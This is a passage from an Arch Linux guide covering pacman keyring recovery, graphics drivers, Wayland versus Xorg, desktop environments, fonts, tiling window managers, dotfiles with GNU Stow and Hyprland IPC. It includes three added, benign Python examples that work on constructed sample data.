This tool sets up a pristine chroot environment in /var/lib/archbuild/, where pacman synchronizes, resolves the declared dependencies, and attempts the build. The resulting package is predictable and clean, and will build the same way on any other user's machine.
5.6.2 Cryptographic Signatures (GPG) in Pacman
To prevent Man-In-The-Middle (MITM) attacks, where a malicious ISP injects malware into packages you download from an HTTP mirror, pacman verifies that each package is cryptographically signed by an Arch Linux "Master Keyholder".
The keyring updates automatically, but if a developer renews their key, your pacman will fail to update with a PGP signature error. This is alarmingly common. The emergency protocol to reset the keyring and purge expired keys (resurrecting a broken pacman) is:
sudo rm -rf /etc/pacman.d/gnupg/
sudo pacman-key --init
sudo pacman-key --populate archlinux
sudo pacman -Sy archlinux-keyring
With this level of depth, your relationship with software in Arch Linux has evolved: you are no longer just a consumer of binaries, you have become an orchestrator capable of building, verifying, signing and distributing software at network scale.
Chapter 6: Desktop Environments and the Graphical Server ↑ Home
In commercial operating systems like Windows or macOS, the graphical interface is hardwired to the operating system kernel. If the window manager crashes, the entire operating system often freezes (the infamous Blue Screen of Death). In Linux, the design philosophy is radically modular. The graphical user interface (GUI) is simply another application (or set of applications) running in user space. You can stop it, replace it with a completely different one, or not use it at all, and your server will continue to function without interruption.
In this chapter, we will build the Graphics Stack from the foundation (the drivers) to the roof (the interactive desktop environment).
6.1 The Base Layer: Graphics Drivers and Mesa ↑ Home
Before we can draw pixels on the screen, the operating system needs to know how to communicate with the graphics processing unit (GPU). Graphics cards are complex mathematical calculators that don't understand standard system commands.
The Linux kernel includes modules (low-level drivers) for the vast majority of hardware. However, to translate 3D instructions (such as OpenGL or Vulkan) from programs to the graphics card, we use Mesa. Mesa is a colossal open-source software project that provides open-source implementations of graphics APIs. If you have an integrated AMD (Radeon) or Intel graphics card, Mesa is the absolute gold standard; it offers outstanding performance and native stability.
Install the Mesa stack:
sudo pacman -S mesa
(Note about NVIDIA: If you have a discrete NVIDIA graphics card, its official driver is proprietary and closed. It does not use Mesa for OpenGL. Detailed installation and configuration of NVIDIA drivers are covered extensively in Chapter 8: Gaming. For now, Mesa will provide basic graphics if you use Nouveau, the open-source NVIDIA driver.)
6.2 The Display Server: Xorg vs Wayland ↑ Home
Once we can communicate with the GPU, we need a master program that manages the physical screen, keyboards, mice, and provides a blank canvas for applications to draw their windows.
6.2.1 The Old King: X Window System (X11 / Xorg)
Developed in 1984 at MIT, X11 has been the standard for almost 40 years. It is a network system (client-server architecture) in which programs (clients) send instructions to the X server to draw.
- Pros: It works everywhere. Thousands of older programs rely on it. It's highly stable.
- Cons: Its codebase is gigantic, archaic, and bloated. It lacks basic security isolation (any X11 program can spy on your keystrokes (keylogger) in another X11 program). Screen tearing is an inherent problem due to its design, unless you use a powerful external compositor.
6.2.2 The New Paradigm: Wayland
Wayland is not a server; it's a modern "protocol" that defines how the screen should be drawn. In the Wayland paradigm, the Desktop Environment (e.g., GNOME or KDE) acts as both the compositor and the server.
- Pros: It's ridiculously fast and smooth. It completely eliminates screen tearing by ensuring every frame is perfect before being sent to the screen. It's secure by design (a Wayland program can't view another program's window without the user's permission via security portals). It handles different monitors with varying refresh rates (e.g., one at 144Hz and another at 60Hz) and different DPI settings flawlessly, something that completely breaks X11.
- Cons: Some very specific or older applications (such as screen capture software designed only for X11) still require compatibility through a bridge called Xwayland.
The Verdict on Arch Linux: Wayland is the present and the future. All the modern desktop environments we'll explore support Wayland by default.
6.3 The Display Manager ↑ Home
A Display Manager (DM), also known as a login manager, is the first graphical interface you see when you boot your computer. Its job is to show you a visually appealing screen, ask for your password, authenticate you through Pluggable Authentication Modules (PAMs), and, if the login is successful, launch the Desktop Environment with your user privileges.
Although technically you could log in from the black console and type startx (or launch a Wayland compositor by hand), a DM is essential for a modern desktop experience. The most professional DMs are:
- SDDM (Simple Desktop Display Manager): The recommended display manager for KDE Plasma. Modern, based on Qt, and with full experimental support for running natively under Wayland.
- GDM (GNOME Display Manager): The GNOME standard. Extremely polished, integrated into the GNOME suite, but resource-intensive.
- LightDM: The long-standing standard for lightweight desktops (like XFCE). It uses X11 under the hood and is incredibly fast.
The Display Manager is installed simultaneously with the desktop environment, as each environment typically requires its own for optimal screen lock integration.
6.4 Desktop Environments: Installation and Architecture ↑ Home
A Desktop Environment (DE) is a massive collection of software (window manager, control panel, file explorer, calculators, image viewers) designed to work seamlessly together. In Arch, we install metapackages (packages that don't contain software themselves, but rather lists of dependencies to download the entire ecosystem at once). Choose only one for your initial installation.
6.4.1 KDE Plasma (The Customizable Colossus)
Developed in C++ using the Qt framework, KDE Plasma is renowned for being the most customizable desktop environment in the Linux world. Ironically, despite its stunning visuals, recent versions have optimized memory (RAM) usage to levels that rival traditional lightweight desktops. Plasma is leading the way in the adoption of Wayland.
Installation:
# Install Plasma, the SDDM display manager and KDE's base applications (Dolphin, Konsole)
sudo pacman -S plasma-meta kde-applications-meta sddm
Enabling: we must tell systemd to start the login screen (SDDM) on the next boot:
sudo systemctl enable sddm.service
6.4.2 GNOME (The Modern Paradigm)
GNOME (developed in C using GTK) takes a different approach. Heavily inspired by macOS, it eliminates the traditional taskbar, the concept of minimizing windows, and the icon-based desktop in favor of a workflow based on dynamic workspaces and a central Activities dashboard. It is the default desktop environment in Fedora and Ubuntu Enterprise. GNOME is intentionally rigid: its developers believe that a carefully curated design should not be indiscriminately altered.
Installation:
sudo pacman -S gnome gnome-extra gdm
Enabling:
sudo systemctl enable gdm.service
6.4.3 XFCE (The Immortal Classic)
XFCE is the king of stability and low power consumption. If you're reviving a 2012 laptop or simply want your environment to remain unchanged, XFCE (based on GTK) is the choice for you. It still uses X11 and does not support Wayland.
Installation:
sudo pacman -S xfce4 xfce4-goodies lightdm lightdm-gtk-greeter
Enabling:
sudo systemctl enable lightdm.service
6.5 Typography and Font Rendering (Fontconfig) ↑ Home
A very common mistake among Arch Linux newbies is installing a desktop environment and noticing that web pages appear "blocky," distorted, or that applications look like they're from the 1990s. Why does this happen? Ubuntu and Manjaro install hundreds of fonts by default. Arch Linux doesn't install any fonts by default (KISS principle). If a web browser tries to render Arial font and your system doesn't have Arial (or a replacement font configured), the screen will display unreadable boxes or the most basic font the kernel can find.
6.5.1 Installing Base Fonts
The font rendering engine in Linux consists of FreeType2 and Fontconfig. To power this engine, we need to install a robust font library:
# Free fonts, emoji support, and Korean/Japanese/Chinese (CJK) fonts to avoid broken characters on the web
sudo pacman -S ttf-dejavu ttf-liberation noto-fonts noto-fonts-emoji noto-fonts-cjk
6.5.2 Microsoft Fonts (Core Fonts)
Regardless of your ideological stance on free software, the modern web was built assuming users have Windows fonts (Arial, Times New Roman, Comic Sans, Trebuchet). Many PDF documents from companies or universities become distorted on Linux if you open the file in LibreOffice and the system doesn't find "Times New Roman." Since these fonts are licensed under Microsoft's proprietary license, they can't be in the official Arch repositories, but you can (and should) install them through the AUR:
yay -S ttf-ms-fonts
Once installed, you can refresh the font cache manually (although the package manager usually does this) with:
fc-cache -fv
6.5.3 Cursor and Icon Themes
Finally, to give the desktop a cohesive look (especially outside of GNOME, which comes with its own tightly integrated icons), it's recommended to install complete icon packs. The modern gold standard is papirus-icon-theme.
sudo pacman -S papirus-icon-theme
Your machine is ready. One simple command, reboot, will take you for the first time out of the abyss of the pure terminal. You'll be greeted by your DM login screen. As you enter your password, the magic will happen, and your Arch Linux graphical workstation will spring to life with performance that users of generic operating systems rarely experience.
6.6 Underlying Infrastructure: DBus and XDG Desktop Portals ↑ Home
When we moved from the archaic X11 (where any program had implicit administrator permission over the screen) to Wayland (where everything is isolated or sandboxed), a massive engineering problem arose: How does a program like OBS Studio record your screen if the Wayland compositor (the head of security) explicitly forbids it?
The answer is XDG Desktop Portals . These portals are standardized API interfaces (independent of whether you use GNOME, KDE, or Hyprland) that applications use to "request permission" from the user via the system bus (DBus).
6.6.1 Screen Sharing Architecture
To enable screen sharing in Google Meet or Discord using Wayland, the web application utilizes the WebRTC standard . WebRTC sends a DBus signal requesting screen access. The "Portal" intercepts this signal and draws a native window of your desktop, asking: "Firefox is requesting to record Monitor 1. Do you accept?"
If you have a pre-built desktop environment like GNOME, this is already installed. But if you built your system manually, you need to install the portal backend for your environment.
# For KDE Plasma:
sudo pacman -S xdg-desktop-portal-kde
# For Hyprland:
sudo pacman -S xdg-desktop-portal-hyprland
Additionally, you need the "base" portal that serves as a router and the compatibility layer for GTK applications (such as Firefox):
sudo pacman -S xdg-desktop-portal xdg-desktop-portal-gtk
Once installed, if you run OBS Studio and add a capture source, you won't choose "XSHM Capture," but rather Screen Capture (PipeWire). PipeWire, as we saw in Chapter 4, not only routes audio, but also routes the raw video stream directly from the compositor to OBS at 60 FPS without any loss of quality or latency.
6.6.2 DBus: The Desktop Nervous System
DBus is the system message bus. If your laptop battery drops to 10%, the kernel sends a signal. DBus picks it up, finds which program is listening for power events (your desktop environment), and delivers the message so it can display a red warning on your screen. You can inspect this alien traffic in real time using auditing tools.
# Install the visual DBus tool
sudo pacman -S d-spy
You'll see that every program (Spotify, Firefox, the network manager) publishes objects on the bus. A hacker or advanced sysadmin can send fake messages over DBus with the command dbus-send to pause the music, lock the screen, or put the system to sleep without using the graphical interface.
6.7 Hardware Video Acceleration (VA-API) ↑ Home
One of the most silent yet destructive flaws of a poor Arch Linux installation is software rendering in browsers. If you play a 4K video on YouTube and notice your laptop getting incredibly hot and the fans running at full speed, your browser isn't using your GPU's dedicated video decoder. It's using the raw CPU (software rendering) to calculate each pixel of the video.
The standard API in Linux for decoding H.264, VP9 or AV1 videos using the graphics card is called VA-API (Video Acceleration API) .
6.7.1 Enabling on Intel and AMD GPUs
# For modern Intel processors (Broadwell or newer)
sudo pacman -S intel-media-driver
# For AMD Radeon
sudo pacman -S libva-mesa-driver
To check whether your hardware can decode, install the libva utilities:
sudo pacman -S libva-utils
vainfo
The output will spit out dozens of profiles (e.g. VAProfileVP9Profile0). If it lists VAEntrypointVLD next to them, the hardware supports full decoding.
6.7.2 Forcing Acceleration in Firefox and Chromium
Despite having the drivers, browsers on Linux disable them by default for fear of causing crashes on faulty hardware.
- In Firefox: type about:config in the address bar. Search for media.ffmpeg.vaapi.enabled and change it to true. Also search for gfx.webrender.all and set it to true.
- In Chromium/Chrome: open chrome://flags, search for Hardware-accelerated video decode and force it to Enabled.
Play a 4K video. Your CPU load will drop from 80% to 3%, and your battery will last 4 hours longer.
6.8 Color Management and ICC Profiles (Colord) ↑ Home
If you're a photographer, graphic designer (using Darktable or GIMP), or video editor in DaVinci Resolve, you know that your monitor can be deceiving. A red on your screen isn't necessarily the same as the standard red used in printing. To correct this, hardware colorimeters (like the X-Rite i1Display) are used, which generate color profile calibration files (.icc).
Linux has a central daemon for color management called colord .
sudo pacman -S colord
In environments like GNOME, color management is natively integrated into the control panel. You select your monitor, load your .icc file, and GNOME adjusts the GPU gamma curves (LUT) automatically.
In Wayland, the color management implementation is an extremely aggressive protocol under development. Professional compositors (such as those designed for the Wayland Color Management Protocol) ensure that 10-bit HDR (High Dynamic Range) color is not modified by XWayland or altered on its way to the monitor, enabling cinematic-grade editing on Arch Linux with greater accuracy than macOS.
Chapter 7: Advanced Window Managers and the Art of Ricing ↑ Home
While KDE and GNOME (Chapter 6) offer the convenience of an all-inclusive hotel, many power users, programmers, and UNIX enthusiasts find traditional desktop environments slow and restrictive. The radical alternative is to use a standalone window manager .
On traditional desktops, windows are "floating" (stacked); you can drag them, resize them with the mouse, and hide them behind one another. Advanced Window Managers use the Tiling philosophy . In tiling, the window manager mathematically calculates your monitor's space and divides the windows into a perfect tile that occupies 100% of the usable space without overlaps. You navigate, close, and move windows exclusively with keyboard shortcuts . The mouse becomes optional. Initially, the learning curve is steep, but once your muscle memory assimilates the shortcuts, productivity skyrockets (and RAM consumption drops from gigabytes to a mere 200MB).
7.1 Tiling Managers in X11 (The Old School) ↑ Home
If you want to maintain maximum compatibility with older software or if your hardware struggles under the new Wayland protocol, Tiling WMs in X11 are your playground.
7.1.1 i3wm: The Binary Tree
i3 (and its successor i3-gaps) is the most famous tiling window manager in Linux history. Its mental model is a tree. When you open a terminal, it occupies the entire screen. If you open a browser, the screen is split in two (50% and 50%). The brilliance of i3 is that its configuration file is incredibly readable plain text, requiring no programming knowledge.
Installation:
sudo pacman -S xorg-server xorg-xinit i3-wm i3status dmenu alacritty
- xinit: lets you start the graphical environment without a heavyweight display manager (SDDM).
- dmenu: a minimalist launcher for starting programs by typing their name.
- alacritty: a modern, ultra-fast terminal emulator (written in Rust and GPU-accelerated).
Initial i3 Setup: To start it, you create a hidden file in your user directory called .xinitrc.
echo "exec i3" > ~/.xinitrcFrom the TTY, you write startxOn the first boot, i3 will generate its master configuration file in ~/.config/i3/configIt will ask you to choose the modifier key (ModKey), which is usually the "Windows/Super" or "Alt" key. From there, Mod+Enteropens terminals; Mod+dOpen the menu; Mod+Shift+qclose windows.
7.1.2 bspwm: The Empty Containers Paradigm
Whereas i3 decides the splits for you based on the focused container, bspwm (Binary Space Partitioning Window Manager) separates window management from keyboard handling: bspwm only manages windows, and a separate daemon, sxhkd, captures your keystrokes and sends it commands through the bspc client. It is the preferred option of hardcore "ricers" on X11 because everything about it can be scripted from bash.
7.2 Wayland Composers: Hyprland (The Immersive Future) ↑ Home
On X11, an i3 user needs picom (a separate daemon) to add shadows, transparency and rounded corners, and that extra layer often brings lag and screen tearing. On Wayland the window manager is also the compositor (all in one), which allows animations as smooth as those on a high-end phone, at the monitor's true refresh rate (120Hz or more).
Hyprland is the dynamic Wayland compositor that has taken the community by storm. It started out on wlroots (the library created by the authors of the Sway compositor) and is written in C++ with a clear priority on visual aesthetics: glassmorphism, customizable animations with Bézier curves, rich shadows and real-time Gaussian blur behind the terminal. Recent releases have replaced wlroots with Hyprland's own backend (Aquamarine), so check the version you install against the Hyprland wiki when following older guides.
7.2.1 Hyprland Stack Installation
Unlike i3, Hyprland needs components written for Wayland (dmenu and the X11 wallpaper setters will not work under it).
sudo pacman -S hyprland kitty waybar wofi hyprpaper dunst
- kitty: GPU-accelerated terminal emulator with excellent Wayland support (Alacritty also works).
- waybar: the highly customizable status bar.
- wofi: a Wayland-native application launcher.
- hyprpaper: Hyprland's wallpaper utility.
- dunst: the notification daemon that draws pop-ups on the screen.
Starting Hyprland: as with i3, you do not need a display manager (SDDM). From the TTY, simply type:
Hyprland
and you will be greeted by a glass-like environment with elastic animations and native Wayland integration.
7.3 The Art of "Ricing" and Dotfile Configuration ↑ Home
The act of taking a minimalist system (i3wm or Hyprland) and meticulously configuring every text file, font, spacing value and hexadecimal color to create a unified, spectacular themed desktop is called "ricing" (slang borrowed from extreme car customization). A "riced" system is a reflection of its user's technical soul.
The files you manipulate for this art are known as Dotfiles , since in Linux any folder or file that begins with a dot ( .) is hidden (for example, .config/).
7.3.1 Hyprland Anatomy.conf
In Hyprland, your life revolves around ~/.config/hypr/hyprland.conf. Unlike XML or JSON, it is a sequential text file that the compositor watches: save the file and the changes are applied instantly, with no manual reload.
Example of how a "ricer" would adjust the overall aesthetic:
general {
    gaps_in = 5                 # inner gap between windows
    gaps_out = 20               # outer gap to the monitor edges
    border_size = 2
    col.active_border = rgba(33ccffee) rgba(00ff99ee) 45deg   # gradient border
    col.inactive_border = rgba(595959aa)
}
decoration {
    rounding = 10               # rounded corners, Apple/Windows 11 style
    blur {
        enabled = true          # translucent glass effect behind windows
        size = 8
        passes = 3              # deep (and GPU-expensive) Gaussian blur
    }
    drop_shadow = yes
    shadow_range = 4
}
Note that Hyprland's configuration keys move between releases: in recent versions the shadow settings live in a shadow { } sub-block inside decoration, so cross-check any snippet you copy against the wiki for the version you are running (hyprctl version).
7.3.2 Nerd Fonts (Icons in Text)
If you open waybar, or look at the configuration of an advanced user's terminal, you will see weather icons, hard-disk icons and Wi-Fi logos embedded directly in the configuration text. How is that done without images? The answer is Nerd Fonts: popular typefaces (JetBrains Mono, Fira Code, Hack...) patched to include thousands of vector glyphs from Font Awesome, Material Design and Devicons.
To get a good-looking terminal and status bar, install Nerd Font packages (many have moved to the official repositories; pacman -Ss nerd lists what is available):
sudo pacman -S ttf-nerd-fonts-symbols ttf-jetbrains-mono-nerd ttf-firacode-nerd
Then tell your terminal (~/.config/kitty/kitty.conf) to use that font:
font_family JetBrainsMono Nerd Font
bold_font auto
italic_font auto
font_size 12.0
7.3.3 Waybar: The Programmable Toolbar
Waybar is the de facto standard bar on Wayland. Module layout (clock, RAM usage, battery, Hyprland workspaces) is configured in JSON (~/.config/waybar/config) and styling in CSS (~/.config/waybar/style.css), so a web developer can build a bar that looks like macOS or a futuristic dashboard without learning a new language.
You can also define "custom modules" that run a shell script every few seconds (say, every 10) to fetch something from the internet (the price of Bitcoin, the temperature in your city) and print it on the bar, which makes the system endlessly versatile. Remember that these scripts run with your user's privileges every time the bar refreshes: read any module script you copy from someone else's dotfiles before enabling it.
7.4 Version Control for Dotfiles (GNU Stow) ↑ Home
Once you have spent three weeks designing the perfect desktop, your hyprland.conf, your waybar scripts and your kitty key bindings form a unified work of art, and you face a problem: if your drive dies, you lose months of fine-tuning. Professionals publish their dotfiles on GitHub (search "Hyprland dotfiles" and you will find thousands).
But how do you synchronize isolated folders such as ~/.config/hypr/ and ~/.config/waybar/ into a single Git repository without dragging along secrets that also live in .config (browser profiles with saved passwords, API tokens, session cookies)?
The classic answer is GNU Stow, a symlink manager.
- Install Stow:
sudo pacman -S stow
- Create a central repository folder, e.g. ~/MisDotfiles.
- Inside it, replicate the path each file has relative to your home, one "package" per program:
~/MisDotfiles/hyprland/.config/hypr/hyprland.conf
- From your home directory, run:
stow hyprland -t ~ -d ~/MisDotfiles
Stow creates a symbolic link in your real home directory (~/.config/hypr/hyprland.conf) pointing at the file inside the repository; it refuses to overwrite a file that already exists there, so move or delete the original first. Now you can git init in ~/MisDotfiles, push it to a remote, and when you install Arch Linux on a new laptop you only clone the repository and run stow with the packages you want (or stow * for all of them) to have your whole visual environment reassembled in seconds. Because only what you deliberately copied into the repository gets linked, the secrets in the rest of .config never leave the machine; add a .gitignore anyway for anything sensitive you do copy in.
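To make concrete what Stow does under the hood, here is a small Python re-implementation of the "link a package tree into a target" operation, added here as an illustration: it is neither this book's code nor GNU Stow, and it is no substitute for it. It builds the ~/MisDotfiles/hyprland/.config/hypr/hyprland.conf layout from above inside a temporary directory (constructed data), links it into a fake home, and shows the conflict rule in action: an existing real file at the destination is never clobbered.

```python
"""Illustrative re-implementation of `stow <pkg> -t <target>` in Python.

Added example for this chapter: it is NOT GNU Stow (use the real thing), it just
shows the mechanism. Every file under <repo>/<pkg>/ is mirrored into <target>/
as a symlink, intermediate directories are created, and, like Stow, an
existing real file at the destination is treated as a conflict, never clobbered.
"""
import os
import tempfile


class StowConflict(Exception):
    """Destination exists and is not a link into this package."""


def plan_links(pkg_dir, target):
    """(link_path, link_target) for every regular file under pkg_dir, sorted."""
    pkg_dir = os.path.abspath(pkg_dir)
    plan = []
    for root, _dirs, files in os.walk(pkg_dir):
        for name in files:
            src = os.path.join(root, name)
            rel = os.path.relpath(src, pkg_dir)          # e.g. .config/hypr/hyprland.conf
            plan.append((os.path.join(target, rel), src))
    return sorted(plan)


def _is_our_link(link_path, src):
    return os.path.islink(link_path) and os.path.realpath(link_path) == os.path.realpath(src)


def stow(pkg_dir, target, dry_run=False):
    """Create the symlinks; return the paths created (or that would be created)."""
    made = []
    for link_path, src in plan_links(pkg_dir, target):
        if os.path.lexists(link_path):
            if _is_our_link(link_path, src):
                continue                                  # already stowed: idempotent
            raise StowConflict(f"{link_path} exists and is not a link into the repo")
        if not dry_run:
            os.makedirs(os.path.dirname(link_path), exist_ok=True)
            os.symlink(src, link_path)
        made.append(link_path)
    return made


def unstow(pkg_dir, target):
    """Remove only the links that point into pkg_dir; leave everything else alone."""
    removed = []
    for link_path, src in plan_links(pkg_dir, target):
        if _is_our_link(link_path, src):
            os.unlink(link_path)
            removed.append(link_path)
    return removed


def demo():
    """Constructed layout: MisDotfiles/hyprland/.config/hypr/hyprland.conf -> home/.config/hypr/."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home")
        repo = os.path.join(tmp, "MisDotfiles")
        os.makedirs(home)
        conf = os.path.join(repo, "hyprland", ".config", "hypr", "hyprland.conf")
        os.makedirs(os.path.dirname(conf))
        with open(conf, "w") as f:
            f.write("general {\n    gaps_in = 5\n}\n")
        links = stow(os.path.join(repo, "hyprland"), home)
        linked_ok = os.path.islink(os.path.join(home, ".config", "hypr", "hyprland.conf"))

        # Second package whose destination already holds a real (unmanaged) file:
        wb_repo = os.path.join(repo, "waybar", ".config", "waybar")
        wb_home = os.path.join(home, ".config", "waybar")
        os.makedirs(wb_repo)
        os.makedirs(wb_home)
        for path in (os.path.join(wb_repo, "config"), os.path.join(wb_home, "config")):
            with open(path, "w") as f:
                f.write("{}\n")
        try:
            stow(os.path.join(repo, "waybar"), home)
            conflict = False
        except StowConflict:
            conflict = True
        removed = unstow(os.path.join(repo, "hyprland"), home)
        return len(links), linked_ok, conflict, len(removed)


if __name__ == "__main__":
    print(demo())   # (1, True, True, 1)
```

The conflict rule is the part worth internalising: on a fresh machine, delete or move the distribution's default ~/.config/hypr/hyprland.conf before stowing, otherwise Stow (and this toy) stop rather than silently replacing your file.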
This is the true power of Arch Linux: the operating system is not a black box; it is plain text at your service.
7.5 Inter-Process Communication (IPC) and Absolute Control ↑ Home
The defining feature that separates a tiling window manager (Hyprland, bspwm) from a monolithic environment like Windows is its IPC (Inter-Process Communication) interface. The window manager listens on a UNIX domain socket (a file in your runtime directory, readable and writable only by your user) through which any script on the machine can send it commands instantly. Note the flip side: any program running as your user, including a malicious one, gets the same control over the compositor, which is one reason sandboxes such as Flatpak do not expose these sockets to the applications they confine.
7.5.1 Mastering hyprctl
In Hyprland the control tool is hyprctl. From any terminal you can order the compositor to perform concrete actions.
- Move to workspace 5:
hyprctl dispatch workspace 5
- Make the current window float:
hyprctl dispatch togglefloating
- Launch a specific application:
hyprctl dispatch exec firefox
The real magic happens when you request information. If you run:
hyprctl clients -j
Hyprland prints a large structured JSON document with the exact X/Y coordinates, PID, size, class and state of every window on your screen. A bash or Python developer can parse that JSON (with jq, or json.loads) and write a script that, for example, detects that Spotify is open and moves it to monitor 2, resizing it to 30% of the width.
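Here is the kind of script that paragraph describes, added as a worked example (not this book's code and not part of Hyprland). It parses constructed hyprctl clients -j and hyprctl monitors -j output, finds the Spotify window and plans the hyprctl dispatch calls that move it to the second monitor as a floating window 30% of its width. The JSON field names and the dispatcher argument formats are the ones Hyprland documents at the time of writing and are assumptions to verify against your version; the live_* helpers only work inside a running session.

```python
"""Added example: plan `hyprctl dispatch` calls from `hyprctl clients -j` output.

Not part of the original page or of Hyprland. Field names (address, class, at,
size, monitor, workspace, floating; id, width, height, scale) and dispatcher
syntax (movetoworkspacesilent WS,address:0x..; togglefloating address:0x..;
resizewindowpixel exact W H,address:0x..) are assumptions from the Hyprland
wiki at the time of writing. The JSON below is constructed sample data.
"""
import json
import subprocess

# Constructed sample: two monitors and three windows, as hyprctl would print them.
SAMPLE_MONITORS = json.loads("""
[
  {"id": 0, "name": "DP-1",     "width": 3840, "height": 2160, "x": 0,    "y": 0, "scale": 2.0},
  {"id": 1, "name": "HDMI-A-1", "width": 2560, "height": 1440, "x": 1920, "y": 0, "scale": 1.5}
]
""")

SAMPLE_CLIENTS = json.loads("""
[
  {"address": "0x55d1a0c0", "class": "firefox", "title": "Arch Wiki", "pid": 4101,
   "at": [0, 0], "size": [1920, 1080], "monitor": 0, "workspace": {"id": 1, "name": "1"},
   "floating": false},
  {"address": "0x55d1b3f0", "class": "Spotify", "title": "Spotify Premium", "pid": 4230,
   "at": [960, 0], "size": [960, 1080], "monitor": 0, "workspace": {"id": 1, "name": "1"},
   "floating": false},
  {"address": "0x55d1c7e8", "class": "kitty", "title": "~", "pid": 4302,
   "at": [0, 0], "size": [1706, 960], "monitor": 1, "workspace": {"id": 2, "name": "2"},
   "floating": false}
]
""")


def logical_width(monitor):
    """Logical (scaled) width: a 3840px panel at scale 2.0 is 1920 logical px."""
    return int(monitor["width"] / monitor["scale"])


def workspace_on_monitor(clients, monitor_id):
    """Workspace id currently shown on monitor_id (taken from the first client found there)."""
    for c in clients:
        if c["monitor"] == monitor_id:
            return c["workspace"]["id"]
    return None


def plan_moves(clients, monitors, window_class="Spotify", target_monitor=1, width_fraction=0.30):
    """Return hyprctl argv lists that move every `window_class` window to
    `target_monitor` as a floating window `width_fraction` of that monitor wide.
    Returns [] when no such window exists or it is already where we want it."""
    mon = next((m for m in monitors if m["id"] == target_monitor), None)
    if mon is None:
        raise ValueError(f"no monitor with id {target_monitor}")
    ws = workspace_on_monitor(clients, target_monitor)
    width = int(logical_width(mon) * width_fraction)
    height = int(mon["height"] / mon["scale"])
    cmds = []
    for c in clients:
        if c["class"].lower() != window_class.lower():
            continue
        if c["monitor"] == target_monitor and c["floating"] and c["size"][0] == width:
            continue                                   # nothing to do
        addr = f"address:{c['address']}"
        if ws is not None:
            cmds.append(["hyprctl", "dispatch", "movetoworkspacesilent", f"{ws},{addr}"])
        if not c["floating"]:
            cmds.append(["hyprctl", "dispatch", "togglefloating", addr])
        cmds.append(["hyprctl", "dispatch", "resizewindowpixel", f"exact {width} {height},{addr}"])
    return cmds


def _hyprctl_json(*args):
    out = subprocess.run(["hyprctl", *args, "-j"], check=True, capture_output=True, text=True).stdout
    return json.loads(out)


def live_clients():
    """Query the running compositor (only works inside a Hyprland session)."""
    return _hyprctl_json("clients")


def live_monitors():
    return _hyprctl_json("monitors")


if __name__ == "__main__":
    # Dry run against the constructed sample; swap in live_clients()/live_monitors() in a session
    # and pass each argv to subprocess.run() to actually move the window.
    for argv in plan_moves(SAMPLE_CLIENTS, SAMPLE_MONITORS):
        print(" ".join(argv))
```

Working from the logical (scaled) width matters on mixed-DPI setups: the 2560px panel at scale 1.5 is 1706 logical pixels wide, so 30% is 511, not 768.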
7.5.2 Event Hooks (Listening to the Composer)
Instead of asking "what is happening", you can plug directly into the compositor and let it inform you in real time (event-driven). Hyprland streams every event to a second UNIX socket, .socket2.sock. Older releases created it under /tmp/hypr/$HYPRLAND_INSTANCE_SIGNATURE/; current releases put it under $XDG_RUNTIME_DIR/hypr/$HYPRLAND_INSTANCE_SIGNATURE/ (ls that directory to see which applies to you).
We can use socat to listen to this continuous stream:
sudo pacman -S socat
socat -U - UNIX-CONNECT:$XDG_RUNTIME_DIR/hypr/$HYPRLAND_INSTANCE_SIGNATURE/.socket2.sock
Leave it running and, as you switch windows or close programs, lines such as activewindow>>firefox,Arch Wiki appear live. "Ricers" use this so that the bar (waybar) reacts within milliseconds, recoloring icons as the user moves between workspaces.
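The same listener in Python, added as an example (not this book's code nor Hyprland's), so a bar or script can react to events without shelling out to socat. It assumes the documented wire format (one EVENT>>DATA line per event, DATA comma-separated), that window titles may themselves contain commas (hence the per-event split limits, an assumption to check against the wiki), and that the socket lives under $XDG_RUNTIME_DIR/hypr/ or, on older releases, /tmp/hypr/. The sample byte stream is constructed and deliberately split mid-line to show why a recv() loop must buffer until a newline.

```python
"""Added example: read Hyprland's event socket (.socket2.sock) and react to events.

Not from the original page or from Hyprland. Assumed wire format: one event per
line, `EVENT>>DATA`, DATA comma-separated (some events carry free text, so the
number of splits is capped per event). The sample stream below is constructed.
"""
import os
import socket

# Events whose last field is free text (titles, monitor names) get a split cap (assumption).
MAXSPLIT = {"activewindow": 1, "focusedmon": 1, "movewindow": 1, "openwindow": 3}


def socket2_path():
    """Locate the event socket of the current session (new and old layouts)."""
    sig = os.environ.get("HYPRLAND_INSTANCE_SIGNATURE")
    if not sig:
        raise RuntimeError("not inside a Hyprland session")
    runtime = os.environ.get("XDG_RUNTIME_DIR", "/tmp")
    for base in (os.path.join(runtime, "hypr"), "/tmp/hypr"):
        p = os.path.join(base, sig, ".socket2.sock")
        if os.path.exists(p):
            return p
    raise FileNotFoundError("Hyprland event socket not found")


def parse_event(line):
    """'activewindow>>firefox,Arch Wiki' -> ('activewindow', ['firefox', 'Arch Wiki'])"""
    name, sep, data = line.partition(">>")
    if not sep:
        raise ValueError(f"malformed event: {line!r}")
    if not data:
        return name, []
    return name, data.split(",", MAXSPLIT.get(name, -1))


def iter_events(chunks):
    """Yield (name, args) from an iterable of byte chunks.

    A recv() may return half a line or several lines at once, so keep a buffer
    and only emit on newline; a trailing partial line waits for the next chunk."""
    buf = b""
    for chunk in chunks:
        buf += chunk
        while b"\n" in buf:
            raw, buf = buf.split(b"\n", 1)
            if raw:
                yield parse_event(raw.decode("utf-8", "replace"))


def recv_chunks(sock):
    while True:
        data = sock.recv(4096)
        if not data:
            return
        yield data


def listen(on_event):
    """Connect to the live socket and call on_event(name, args) for every event."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(socket2_path())
        for name, args in iter_events(recv_chunks(s)):
            on_event(name, args)


# Constructed sample stream, split mid-line on purpose to exercise the buffering.
SAMPLE_CHUNKS = [
    b"workspace>>2\nactivewindow>>firefox,Tiling, gaps and bo",
    b"rders - Mozilla Firefox\nactivewindowv2>>55d1a0c0\n",
    b"closewindow>>55d1b3f0\nfocusedmon>>HDMI-A-1,2",
    b"\n",
]


def summarize(chunks):
    """Example consumer: the state a status bar keeps (workspace, window title, monitor)."""
    state = {"workspace": None, "window": None, "monitor": None, "closed": []}
    for name, args in iter_events(chunks):
        if name == "workspace":
            state["workspace"] = args[0]
        elif name == "activewindow":
            state["window"] = args[1] if len(args) > 1 else None
        elif name == "focusedmon":
            state["monitor"] = args[0]
        elif name == "closewindow":
            state["closed"].append(args[0])
    return state


if __name__ == "__main__":
    print(summarize(SAMPLE_CHUNKS))                 # offline, on the constructed stream
    # listen(lambda n, a: print(n, a))              # live, inside a Hyprland session
```

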